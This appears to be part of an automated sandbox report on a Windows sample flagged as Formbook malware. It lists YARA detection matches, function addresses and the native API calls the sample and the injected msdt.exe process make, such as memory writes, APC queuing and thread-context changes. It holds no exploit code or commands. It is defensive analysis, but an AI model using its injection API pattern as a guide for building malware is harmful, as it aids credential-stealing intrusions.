          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037F1084_2_0037F108
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_003706CC4_2_003706CC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414F04_2_004414F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00441D514_2_00441D51
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445E404_2_00445E40
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004427524_2_00442752
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004454504_2_00445450
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C784_2_00445C78
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004458084_2_00445808
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004498204_2_00449820
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004468C84_2_004468C8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004404E74_2_004404E7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C884_2_00445C88
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414BD4_2_004414BD
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044B5884_2_0044B588
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445A04_2_004445A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445B04_2_004445B0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445A604_2_00445A60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004436684_2_00443668
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044CE004_2_0044CE00
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004457FA4_2_004457FA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00AD79AE4_2_00AD79AE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004010265_2_00401026
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041D0345_2_0041D034
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C0C75_2_0041C0C7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C9695_2_0041C969
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004011745_2_00401174
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B93E5_2_0041B93E
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE0C65_2_00BBE0C6
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BED0055_2_00BED005
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD905A5_2_00BD905A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC30405_2_00BC3040
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE2E95_2_00BBE2E9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C612385_2_00C61238
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BE63DB5_2_00BE63DB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBF3CF5_2_00BBF3CF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C663BF5_2_00C663BF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC23055_2_00BC2305
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A37B5_2_00C0A37B
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC73535_2_00BC7353
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD14895_2_00BD1489
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF54855_2_00BF5485
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BFD47D5_2_00BFD47D
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BDC5F05_2_00BDC5F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C065405_2_00C06540
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC351F5_2_00BC351F
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC46805_2_00BC4680
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCE6C15_2_00BCE6C1
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C626225_2_00C62622
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A6345_2_00C0A634
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCC7BC5_2_00BCC7BC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C4579A5_2_00C4579A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF57C35_2_00BF57C3
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C5F8EE5_2_00C5F8EE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00AD79AE5_2_00AD79AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A12387_2_026A1238
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE2E97_2_025FE2E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A37B7_2_0264A37B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026073537_2_02607353
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026023057_2_02602305
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FF3CF7_2_025FF3CF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026263DB7_2_026263DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A63BF7_2_026A63BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026030407_2_02603040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261905A7_2_0261905A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262D0057_2_0262D005
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE0C67_2_025FE0C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A26227_2_026A2622
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A6347_2_0264A634
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260E6C17_2_0260E6C1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026046807_2_02604680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026357C37_2_026357C3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C7BC7_2_0260C7BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268579A7_2_0268579A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263D47D7_2_0263D47D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268443E7_2_0268443E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026354857_2_02635485
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026114897_2_02611489
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026465407_2_02646540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260351F7_2_0260351F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261C5F07_2_0261C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B3A837_2_026B3A83
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02627B007_2_02627B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FFBD77_2_025FFBD7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268DBDA7_2_0268DBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026ACBA47_2_026ACBA4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262286D7_2_0262286D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C85C7_2_0260C85C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269F8EE7_2_0269F8EE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268394B7_2_0268394B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026859557_2_02685955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026169FE7_2_026169FE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026029B27_2_026029B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A098E7_2_026A098E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261EE4C7_2_0261EE4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02632E2F7_2_02632E2F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262DF7C7_2_0262DF7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02610F3F7_2_02610F3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02672FDC7_2_02672FDC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269CFB17_2_0269CFB1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260CD5B7_2_0260CD5B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02630D3B7_2_02630D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269FDDD7_2_0269FDDD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009D0347_2_0009D034
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009C0C57_2_0009C0C5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 02643F92 appears 132 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0264373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0266F970 appears 84 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C2F970 appears 46 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00BBDF5C appears 65 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C0373B appears 109 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C03F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185EA NtCreateFile,5_2_004185EA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418642 NtCreateFile,5_2_00418642
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041869A NtReadFile,5_2_0041869A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk,5_2_00BB00C4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk,5_2_00BB0078
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00BB0048
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk,5_2_00BB07AC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk,5_2_00BAF9F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk,5_2_00BAF900
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_00BAFAE8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00BAFAD0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_00BAFBB8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00BAFB68
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00BAFC90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_00BAFC60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk,5_2_00BAFD8C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00BAFDC0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00BAFEA0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00BAFED0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk,5_2_00BAFFB4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB10D0 NtOpenProcessToken,5_2_00BB10D0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0060 NtQuerySection,5_2_00BB0060
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB01D4 NtSetValueKey,5_2_00BB01D4
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB010C NtOpenDirectoryObject,5_2_00BB010C
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB1148 NtOpenThread,5_2_00BB1148
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk,7_2_025F00C4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk,7_2_025F07AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_025EFAD0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_025EFAE8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk,7_2_025EFAB8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk,7_2_025EFB50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_025EFB68
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_025EFBB8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF900 NtReadFile,LdrInitializeThunk,7_2_025EF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF9F0 NtClose,LdrInitializeThunk,7_2_025EF9F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_025EFED0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk,7_2_025EFFB4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_025EFC60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_025EFDC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk,7_2_025EFD8C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0048 NtProtectVirtualMemory,7_2_025F0048
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0078 NtResumeThread,7_2_025F0078
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0060 NtQuerySection,7_2_025F0060
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F10D0 NtOpenProcessToken,7_2_025F10D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1148 NtOpenThread,7_2_025F1148
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F010C NtOpenDirectoryObject,7_2_025F010C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F01D4 NtSetValueKey,7_2_025F01D4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA50 NtEnumerateValueKey,7_2_025EFA50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFA20 NtQueryInformationFile,7_2_025EFA20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBE8 NtQueryVirtualMemory,7_2_025EFBE8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF8CC NtWaitForSingleObject,7_2_025EF8CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF938 NtWriteFile,7_2_025EF938
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F1930 NtSetContextThread,7_2_025F1930
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFE24 NtWriteVirtualMemory,7_2_025EFE24
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFEA0 NtReadVirtualMemory,7_2_025EFEA0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFF34 NtQueueApcThread,7_2_025EFF34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFFC NtCreateProcessEx,7_2_025EFFFC
